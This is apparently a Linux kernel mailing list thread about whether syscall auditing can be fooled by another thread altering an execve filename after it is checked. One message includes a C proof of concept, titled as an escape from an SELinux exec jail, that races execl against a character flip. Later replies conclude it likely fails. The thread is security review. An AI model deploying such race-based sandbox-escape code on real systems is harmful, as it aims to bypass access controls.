Hi David, As I am looking into the system-wide system call tracing problem, I start to wonder how auditsc deals with the fact that user-space could concurrently change the content referred to by the __user pointers. This would be the case for execve. If we create a program with two thread; one is executing execve syscalls and the other thread would be modifying the userspace string containing the name of the program to execute. Since we have two copy_from_user, one in auditsc and one in the real execve() function, the string passed to the OS could differ from the string seen by auditsc. Regards, Mathieu -- Mathieu Desnoyers OpenPGP key fingerprint: 8CD5 52C3 8E3C 4140 715F BA06 3F25 A8FE 3BAE 9A68 --
In general we have to copy the content into kernel space, audit it, and then act on it from there. See the explanation on the IPC audit patch at http://lwn.net/Articles/125350/ for example. I was going to suggest that that attack vector won't work, because execve() kills all threads. But all you have to do to avoid that is put the data in question into a shared writable mmap and modify it from another _process_. And in fact I suspect there's a combination of CLONE_ Right. Don't Do That Then. The audit code should see what's _actually_ given to the child process. The audit/execve code has changed since I last looked, but I think it's probably OK because it's reading the contents of the new program's mm on the way back from the execve() system call -- before ever giving the CPU back to that process. -- dwmw2 --
Even better : if execve fails, it doesn't kill the threads. Therefore,
all we have to do is to busy-loop doing failing execve() calls and
atomically change the string to what we want to be executed. Can anyone
test the sample snippet in a context where executing /bin/bash is
disallowed on a SMP system ? I don't have a selinux setup handy. I
suppose that as soon as selinux would see one /bin/bash exec, it will
kill the process, so a few runs would be required in order to generate
the correct race.
/*
* Escaping selinux exec jail
*
* build with gcc -lpthread -o escape-selinux escape-selinux.c
*
* Mathieu Desnoyers
* License: GPL
*/
#include <stdio.h>
#include <pthread.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <stdio.h>
#include <signal.h>
static char modstring[] = "$bin/bash";
void *thr1(void *arg)
{
while(1) {
execl(modstring, NULL);
}
return ((void*)1);
}
void *thr2(void *arg)
{
while(1) {
modstring[0] = '$';
modstring[0] = '/';
}
return ((void*)2);
}
int main()
{
int err;
pthread_t tid1, tid2;
void *tret;
err = pthread_create(&tid1, NULL, thr1, NULL);
if (err != 0)
exit(1);
err = pthread_create(&tid2, NULL, thr2, NULL);
if (err != 0)
exit(1);
sleep(10);
err = pthread_join(tid1, &tret);
if (err != 0)
exit(1);
err = pthread_join(tid2, &tret);
if (err != 0)
exit(1);
return 0;
--
Mathieu Desnoyers
OpenPGP key fingerprint: 8CD5 52C3 8E3C 4140 715F BA06 3F25 A8FE 3BAE 9A68
--
I thought selinux did hook into syscall audit ? (sorry, I am new to the kernel auditing field) The race I refer to is in the auditsc.c kernel code, so syscall audit would be the one I am talking about. I refer to selinux here just because, as of my understanding, it happens to be one module-based callback which can hook on syscall audit. Mathieu -- Mathieu Desnoyers OpenPGP key fingerprint: 8CD5 52C3 8E3C 4140 715F BA06 3F25 A8FE 3BAE 9A68 --
SELinux is a user of the audit subsystem in terms of generating audit messages for permission denials. It doesn't rely on any inputs from the audit subsystem. -- Stephen Smalley National Security Agency --
Actually, getname/putname seems to make sure the name is only copied once per audit context. So it should be ok. Mathieu -- Mathieu Desnoyers OpenPGP key fingerprint: 8CD5 52C3 8E3C 4140 715F BA06 3F25 A8FE 3BAE 9A68 --
SELinux doesn't base any of its decisions on pathname strings provided by the user (or pathnames at all, for that matter; SELinux is -- Stephen Smalley National Security Agency --
